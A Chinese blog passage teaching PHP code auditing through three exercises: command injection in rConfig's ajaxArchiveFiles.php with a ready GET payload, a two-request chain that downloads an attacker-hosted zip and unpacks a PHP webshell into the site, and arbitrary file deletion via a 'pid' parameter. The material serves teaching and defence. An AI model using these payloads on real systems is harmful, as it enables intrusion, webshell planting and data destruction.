当前位置：首页 > news >正文

PHP代码审计之实战审代码篇2

news 2026/2/8 12:36:11

4. 仔细观察如下代码，思考代码有什么缺陷，可能由此引发什么样的问题？

<?php
require_once("/home/rconfig/classes/usersession.class.php");
require_once("/home/rconfig/classes/ADLog.class.php");
require_once("/home/rconfig/config/functions.inc.php");
$log = ADLog::getInstance();
if (!$session->logged_in) {echo 'Don\'t bother trying to hack me!!!!!<br /> This hack attempt has been logged';$log->Warn("Security Issue: Some tried to access this file directly from IP: " . $_SERVER['REMOTE_ADDR'] . " & Username: " . $session->username . " (File: " . $_SERVER['PHP_SELF'] . ")");// need to add authentication to this scriptheader("Location: " . $config_basedir . "login.php");
} else {
//archive logs files$mainPath = $_GET['path'];$archiveMainPath = $mainPath . "archive/";$ext = "*." . $_GET['ext'];$fullpath = $mainPath . $ext;
// create and archive dir if not already createdif (!is_dir($archiveMainPath)) {mkdir("$archiveMainPath");}$today = date("Ymd");$commandString = "sudo -u apache zip -r -j " . $archiveMainPath . "filename" . $today . ".zip " . $mainPath . $ext;$ext 是拼接上去的 是可控传参 没有经过任何过滤exec($commandString);foreach (glob($fullpath) as $v) {unlink($v);}$fileCount = count(glob($mainPath . $ext));if ($fileCount > 0) {$response = json_encode(array('failure' => true));} else {$response = json_encode(array('success' => true));}echo $response;
}  // end session check

拼接造成命令注入了！
相关payload参考

GET /lib/ajaxHandlers/ajaxArchiveFiles.php?path=1&ext=;ls%3E../../pq.txt HTTP/1.1

5.仔细观察如下代码，思考代码有什么缺陷，可能由此引发什么样的问题？

/A/c/PluginsController.php

PHP 的 fopen() 函数可以用来打开远程文件

其中这个类可用用action参数去调用不同函数，例如以下

解题:
那我们可以发两个包，一个用来调用start-download 函数来下载一个远程的zip文件。当然这个地址是我们可控的，
action=start-download&filepath=msgphone&download_url=http://0.0.0.0/test/a.zip
第二个包就调用file-upzip函数，让它去解压含php马的zip文件，也正好解压到了网站下的A/exts ,我们去访问它
action=sfile-upzip&filepath=msgphone&download_url=

6.仔细观察如下代码，思考代码有什么缺陷，可能由此引发什么样的问题？

public function delall(){if(isset($_POST['send'])){if(validate::isNullString($_POST['pid'])) tool::layer_alert('没有选择任何图片!','?a=pic',7);$_fileDir=ROOT_PATH.'/uploads/';foreach($_POST['pid'] as $_value){$_filePath=$_fileDir.$_value;if(!unlink($_filePath)){tool::layer_alert('图片删除失败,请设权限为777!','?a=pic',7);}else{header('Location:?a=pic');}}}}

pid是我们可控的，而且之后是拼接到filepath的那这不就造成任意文件删除了吗！
解题

PHP代码审计之实战审代码篇2

4. 仔细观察如下代码，思考代码有什么缺陷，可能由此引发什么样的问题？ <?php require_once("/home/rconfig/classes/usersession.class.php"); require_once("/home/rconfig/classes/ADLog.class.php"); require_onc…...

编程日记 2024/1/8 2:10:05

05 Ciso模拟器连接腾讯云物联网开发平台

Ciso声明：本篇文章基于使用腾讯云物联网平台连接自定义esp8266物联网设备(腾讯连连控制开关实现) - CSDN App改编一、总体概览功能描述： 使用腾讯连连小程序进行控制， Alarm（警铃）：开的时候&#xff…...

编程日记 2024/1/8 2:07:02

Nginx(二十) 获取真实客户端IP

客户端在访问互联网应用服务器时，与真实的应用服务器之间会因为有多层反向代理，而导致真实应用服务器获取的仅是最近一层的反向代理服务器 IP。为使 Nginx 后端的上游服务器可以获得真实客户端 IP，Nginx 提供了 ngx_http_realip_module 模块用…...

编程日记 2024/1/8 2:06:01

【攻防世界】Reverse—— IgniteMe writeup

main函数：首先检查前4个字符是否“EIS{”，如果是，则会进入check函数。如果check返回true，则会显示“Congratulations” int __cdecl main(int argc, const char **argv, const char **envp) {int result; // eaxsize_t i; // [es…...

编程日记 2024/1/8 2:05:00

m1芯片电脑上的paragon15如何安装激活 m1芯片电脑上ntfs for mac如何安装

Paragon NTFS软件在M1芯片电脑上安装之后，最后一步会让我们“允许加载第三方内核扩展”，具体如下图所示。图1：允许加载第三方内核扩展按照图中提示“单击此处“，然后打开安全与隐私。接下来依次点击小锁标志进行解锁&#xff0c…...

编程日记 2024/1/8 2:02:58

【DevOps-01]】DevOps介绍

一、简要描述 DevOps：Development & Operations的缩写，也就是开发&运维 DevOps是一个不断提高效率并且持续不断工作的过程。核心：简化Dev和Ops团队之间的流程，使整体软件开发过程更快速。 DevOps定义： DevOps 强调的是高效组织团队之间如何通过自动化的工具协作和…...

编程日记 2024/1/8 2:00:56

基于PHP的花店管理系统

有需要请加文章底部Q哦可远程调试基于PHP的花店管理系统一介绍此花店管理系统基于原生PHP开发，数据库mysql，前端bootstrap。系统角色分为用户和管理员。(附带参考设计文档) 技术栈：phpmysqlbootstrapphpstudyvscode 二功能用户 1 …...

编程日记 2024/1/8 1:57:54

《PySpark大数据分析实战》-24.数据可视化图表介绍

📋 博主简介 💖 作者简介：大家好，我是wux_labs。😜 热衷于各种主流技术，热爱数据科学、机器学习、云计算、人工智能。通过了TiDB数据库专员（PCTA）、TiDB数据库专家（PCTP…...

编程日记 2024/1/8 1:56:53

kafka 偏移量的类型与提交方式

kafka checkpoint 在流处理中，“checkpoint” 通常指的是将应用程序的状态保存到可靠的存储系统中，以便在发生故障或应用程序需要重启时能够从先前的状态中恢复。这包括保存处理过的事件、中间结果以及任何其他状态信息。“Checkpointing” 可以确保系统的一致性，并提供容错…...

编程日记 2024/1/8 1:54:52

TCP服务器的编写(下)

我们现在开始对我们的客户端开始封装我们的客户端，创建完套接字，需不需要bind呢？？ 当然是不需要的，你本身是一个客户端，其他人写的应用也可能是客户端，如果我们bind，一定意味着我们…...

编程日记 2024/1/8 1:52:50

Linux系统安全及应用

目录一、系统安全的加固 1、账号安全的基本措施 1.1 将用户设置为无法登录 1.2 锁定长期不使用的账号 1.3 删除无用的账号 1.4 锁定账号文件passwd、shadow 2、密码安全控制 2.1 设置密码有效期 2.1.1 适用于新建用户 2.1.2 适用于已有用户 2.2 强制用户下次登录一…...

编程日记 2024/1/8 1:50:48

初识Web服务器

一、web服务器 1、什么是web服务器？ web服务器就是web项目的容器，我们将开发好的web项目部署到web容器中，才能使用网络中的用户通过浏览器进行访问。一张图带你了解web服务器有啥作用： 在我的电脑上有一个已经做好的项目&#…...

编程日记 2024/1/8 1:48:47

IOS - 手机安装包 ipa 常见几种方式

安装 ipa 包的方法有很多中，可以通过不同的软件安装，本文只列出了常用的几种，做个简单的归纳整理 1、iTunes 安装数据线连接手机之后，会自动连接iTunes，（第一次连接的时候会提示是否信任此电脑&#xff0…...

编程日记 2024/1/8 1:47:46

60、resnet50 权值和参数加载

上一节我们将 resnet50 中需要下载的权值，以及每层卷积的参数，都下载并且保存到了仓库 resnet50_weight 目录，在仓库的这个连接。在将权值保存好之后，接下来就是要看如何使用这些权值，也就是如何加载。本节就介绍下我们实战过程中，如何加载这些权值。加载权值加载权…...

编程日记 2024/1/8 1:45:45

wordpress在界面将站点地址直接修改为https导致上不去问题的解决办法

wordpress在界面将站点地址直接修改为https导致上不去问题的解决办法 #修改数据库yz_options...

编程日记 2024/1/8 1:44:43

数字IC后端实现之快速获取innovus中drv violation的所有net list

在Innovus中place_opt_design和optDesign阶段，我们经常会看到如下所示的log提示信息，核心关键词是“ Reasons for remaining drv violations”。而且告诉我们总共有819条net存在drv violation，且无法被工具优化掉。 Reasons for remaining dr…...

编程日记 2024/1/8 1:42:41

【开源】基于JAVA语言的智能教学资源库系统

目录一、摘要1.1 项目介绍1.2 项目录屏二、功能模块2.1 数据中心模块2.2 课程档案模块2.3 课程资源模块2.4 课程作业模块2.5 课程评价模块三、系统设计3.1 用例设计3.2 数据库设计3.2.1 课程档案表3.2.2 课程资源表3.2.3 课程作业表3.2.4 课程评价表四、系统展示五、核心代…...

编程日记 2024/1/8 1:40:39

数据库定义和操作语句的重要语法

数据库📊的10种语法数据查询语句 select : 用于从数据库中检索数据。 select column1, column2,.... from table_name where condition; select distinct : 用于从数据库中检索唯一的数据值。 select DISTINCT column1, clumn2,... from table_name; 工作原理…...

编程日记 2024/1/8 1:38:37

计算机组成原理 CPU的功能和基本结构和指令执行过程

文章目录 CPU的功能和基本结构CPU的功能CPU的基本结构指令执行过程指令周期概念指令执行方案指令数据流取周期数据流析指周期数据流执行周期数据流中断周期数据流数据通路的功能和基本结构数据通路的功能数据通路的结构单总线 CPU的功能和基本结构 #mermaid-svg-0uHwjZOZh4kS…...

编程日记 2024/1/8 1:37:36

批量归一化：彻底改变深度学习架构

一、介绍在深度学习的动态领域，批量归一化的引入标志着神经网络训练方法的关键转变。这项创新技术由 Sergey Ioffe 和 Christian Szegedy 在 2015 年提出，已成为现代神经网络架构的基石。它解决了训练深度网络的关键挑战，特别是处理臭名昭著…...

编程日记 2024/1/8 1:35:34

测试微信模版消息推送

进入“开发接口管理”--“公众平台测试账号”，无需申请公众账号、可在测试账号中体验并测试微信公众平台所有高级接口。获取access_token: 自定义模版消息： 关注测试号：扫二维码关注测试号。发送模版消息： import requests da…...

编程新知 2026/2/8 4:37:13

Chapter03-Authentication vulnerabilities

文章目录 1. 身份验证简介1.1 What is authentication1.2 difference between authentication and authorization1.3 身份验证机制失效的原因1.4 身份验证机制失效的影响 2. 基于登录功能的漏洞2.1 密码爆破2.2 用户名枚举2.3 有缺陷的暴力破解防护2.3.1 如果用户登录尝试失败次…...

编程新知 2026/2/7 4:57:53

【JavaEE】-- HTTP

1. HTTP是什么？ HTTP（全称为"超文本传输协议"）是一种应用非常广泛的应用层协议，HTTP是基于TCP协议的一种应用层协议。应用层协议：是计算机网络协议栈中最高层的协议，它定义了运行在不同主机上…...

编程新知 2026/1/26 21:34:05

Oracle查询表空间大小

1 查询数据库中所有的表空间以及表空间所占空间的大小 SELECTtablespace_name,sum( bytes ) / 1024 / 1024 FROMdba_data_files GROUP BYtablespace_name; 2 Oracle查询表空间大小及每个表所占空间的大小 SELECTtablespace_name,file_id,file_name,round( bytes / ( 1024 …...

编程新知 2025/11/8 0:24:13

java 实现excel文件转pdf | 无水印 | 无限制

文章目录目录文章目录前言 1.项目远程仓库配置 2.pom文件引入相关依赖 3.代码破解二、Excel转PDF 1.代码实现 2.Aspose.License.xml 授权文件总结前言 java处理excel转pdf一直没找到什么好用的免费jar包工具，自己手写的难度，恐怕高级程序员花费一年的事件，也…...

编程新知 2025/11/5 4:10:42

高频面试之3Zookeeper

高频面试之3Zookeeper 文章目录高频面试之3Zookeeper3.1 常用命令3.2 选举机制3.3 Zookeeper符合法则中哪两个？3.4 Zookeeper脑裂3.5 Zookeeper用来干嘛了 3.1 常用命令 ls、get、create、delete、deleteall3.2 选举机制半数机制（过半机制&#xff0…...

编程新知 2026/1/25 13:13:20

uniapp中使用aixos 报错

问题： 在uniapp中使用aixos，运行后报如下错误： AxiosError: There is no suitable adapter to dispatch the request since : - adapter xhr is not supported by the environment - adapter http is not available in the build 解决方案&…...

编程新知 2025/11/29 21:26:48